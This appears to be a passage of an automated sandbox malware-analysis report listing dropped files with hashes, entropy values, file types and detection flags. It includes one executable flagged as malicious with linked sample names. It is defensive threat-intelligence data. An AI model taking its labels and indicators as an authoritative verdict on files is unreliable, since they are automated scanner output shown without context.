                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):93502
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0893492971314966
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:qji7RyAEej6LUCvtRQrHlqJOtGQVxDFhCcIn/kOW1vlpxTwzynAleRKV:qji7RyAEej6LUCvtRQrHwJOtGQVxDFhI
                                                                                                                                                                                                                                                                                                                                                                MD5:F09F64F4B3E1688792673937117502BA
                                                                                                                                                                                                                                                                                                                                                                SHA1:5FBE99297D773D7C6648CBA5EEF3DAAA82DD059E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F5B0362DD81E9FBB931A43D81001CE0FD942AFEE001357DAF2AD29A1D7EB5845
                                                                                                                                                                                                                                                                                                                                                                SHA-512:91F210A54B7510AF831A85E00F8C7455A31EAA3AF4CADAF8CD9796F345342A966FA5F77430CCEADF289F17B45BAC61C9BBB9B586353362C6195BD690FEA7113F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6850614636883345
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWuE7lQYp8Ywf3WZHhUYEZNg2htFiJM8JfYwHB5M3aJimZM5KEIFd3:2ZD0FO2CveaJiuM5KzFd3
                                                                                                                                                                                                                                                                                                                                                                MD5:5408FD5E5E788CE56C6D0AB08D09326B
                                                                                                                                                                                                                                                                                                                                                                SHA1:84CC54ABA4D17F37369D52D52F173F0531504586
                                                                                                                                                                                                                                                                                                                                                                SHA-256:978CDFAEDB86BF5F786B403ADA84FB3D4CAC03034F5A1B6E1878E0FBE2976B32
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FC27F2C3DA1EF2605F1BCCFB33B481E295324B11705F71FE4E4CAF42A74987604C47FE435F88C8431EFF675EE4C2CA0D75182FE5275C33D86179B2849110375A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):95500
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0854120355547283
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:yx4It5OepAVUCvtX4Y6eCjx+HClkJxVYryUbc6iMEvVZw64mryIGb97EMvcjSeFk:yx4It5OepAVUCvtX4YdCjx+HClkJxVYX
                                                                                                                                                                                                                                                                                                                                                                MD5:0F2F9978408BDDC2C084B47A968D2DFD
                                                                                                                                                                                                                                                                                                                                                                SHA1:69A0A5CDA55502E122A094863B7BBA2C3052487D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A5CB2E2A5A78502D71983017A989725F89412471EA658B7A48163A19C76E1420
                                                                                                                                                                                                                                                                                                                                                                SHA-512:83CD35D4B1F829F6798CCECDCBFD2E11A856FE40BF5F54EC4349B770D3E565CFBD81C17EDD20F7FF8CB38F057F536CBC53737B466C877B75C00AAE03D89BDCFE
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6842711834154067
Encrypted:false
SSDEEP:96:TiZYWr68yYFYIYOWmqHEUYEZJftFizMrJq8wj8w4MagbWM4RnoIp63:2ZDrzfhumXagbWM4RnPp63
MD5:DF760FB91B0D771BD52B8C36DF2E2295
SHA1:BDFBD4803ED9AD7CE127BCC7D7D82349C1AA0B15
SHA-256:9CABDFFAE38619F9DCED37DB2AC383AEF94DCBA1294982EA5DCE1923226657E0
SHA-512:BC5B96DF883EC3AA4D04E4761613F3665352EF010565F79C469D34FEFB4F71316F295E0F0E8B03D5849691D40C3357A33F3BEE57B3EE363F21A35E4536AF209B
Malicious:false
Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):91370
Entropy (8bit):3.0929831219069186
Encrypted:false
SSDEEP:1536:vyuD2hFKUCvbT4d6eCjx+HClkJxVYryUbc6iMEvVZw64mryIGb97EtpKp2XGj:vyuD2hFKUCvbT4ddCjx+HClkJxVYryUl
MD5:C67C1DD572A326E154954E21A3D66728
SHA1:268806760C7799C13D11687D48166321B205DD6E
SHA-256:74325A9131C48DA5ECF295B306EE2AE06A9F30C98C4136E7B95482A6D0029C16
SHA-512:75D2154D76BC3946240657F1F8C02CEE4A92A746843A79390EB02FEF933F5E4EE562EE739D2133BD8E014DF28B70D047125A4EB9D321231F5DC81817F4C9EDF9
Malicious:false
Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6847588175952732
Encrypted:false
SSDEEP:96:TiZYWAEaphbYOYWWzLDHbUYEZ1FUtFi+0M6JK8wSZIQaTCPMdh8I1G3:2ZDoJsLyDbaTCPMdh71G3
MD5:7AE70555C880EE1BD874ED5909B1C87A
SHA1:3B53620BB3DAC1A9FAF99EE7FB57BE3FF76ACE92
SHA-256:4C91573031461F1721802E2AD34BE2AF6BFEA5F928AFDC3FCB8326C97FF22F49
SHA-512:C704480F41EB853F5C16D1D4D590FBD7B017DA51342EC44F5352C543DCB368FE9B14AF619AE6BE083D7868DB8D505D7DB9A6C3F2E71D9F96CA73B6FA94054B03
Malicious:false
Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):90928
Entropy (8bit):3.0937421004984365
Encrypted:false
SSDEEP:1536:hPwehGM0rcn26lW8YBvRCjx+HClkJxVYryUbc6iMEvVZw64mryIGb97EOER72T2B:hPwehGM0rcn26lW8YBJCjx+HClkJxVYE
MD5:93DBF145B135297CBC5FDCA37228C178
SHA1:185265A38932A826893C63DDF458FFD35A348AFD
SHA-256:132A6C6BFC928C5772064291AFA7372BD8F99165F67BD89824CCB8ED47FA6327
SHA-512:650028FED5409B19B5C8DDF09D54DBFE1D6C0F4A05975896F60F0653A1C370A0F8A34D5E78B26E063E05E90FC3D1FCCF37FD623292ABDC80F039D374D3FD87DB
Malicious:false
Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.686734402011584
Encrypted:false
SSDEEP:96:TiZYWedR3wdcYgtYR1W2HiUYEZIYtFiPMMJkWwQj7a36qMLv7IKj3:2ZDeKcvt+8hHa36qMLv0Kj3
MD5:05407AB5687E4E5FCDBC08A9AD2F89E6
SHA1:3F4A8612FABA3FCCA5F8582EF7AA585F8F3A5396
SHA-256:1061CB8DD10F9732EC875E1D5887B3276A56C5FFDFB3131B32021210960742EE
SHA-512:0362AA9FF088994E21B6E078D49760C46F9BD6376EA0531270738BE47EC1BE58965CA43F42416643CF0A4C42D551323F675956E4E10A38D6F8FEAC382B34EAF6
Malicious:false
Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.692704155467908
Encrypted:false
SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                                                                                                                                                MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                                                                                                                                                SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                                                                                                                                                SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                                                                                                                                                SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                                                                                                                                                MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                                                                                                                                                SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                                                                                                                                                SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                                                                                                                                                SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3047424
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.876980552165079
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:ubxuBXjA7pOxwz1HCBCvWV3BE1G89lHdXCkdC7EVUgKcAWg5t:exeYka7WVBEk89lHdXCkdQEdA
                                                                                                                                                                                                                                                                                                                                                                MD5:29DEB5EE2C07F1E8660E10AB6E4A0966
                                                                                                                                                                                                                                                                                                                                                                SHA1:CE8D68341F3A150E0AE4F26BCE649E505F766A5D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EC88B7D9AAB10E45DC4AC1AAFFA5D9DA9BF2E368580BDDF16F0DDE301E97B43F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4D3E6117EA337CA5902CC4E19C99C82A177AB889412E58BFF59B88B348D5589EA3AA10E48878C14DF80276C79FF43D6A15D893E1C53C9888FDD7BDD746D3435B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                                • Filename: zbnq9rGNLi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: e5eFd2bt37.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.696913287597031
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                                                                                                                                                                                                                                                                                                                                                MD5:44ECF9E98785299129B35CBDBCAB909B
                                                                                                                                                                                                                                                                                                                                                                SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                                                                                                                                                                                                                                                                                                                                                SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
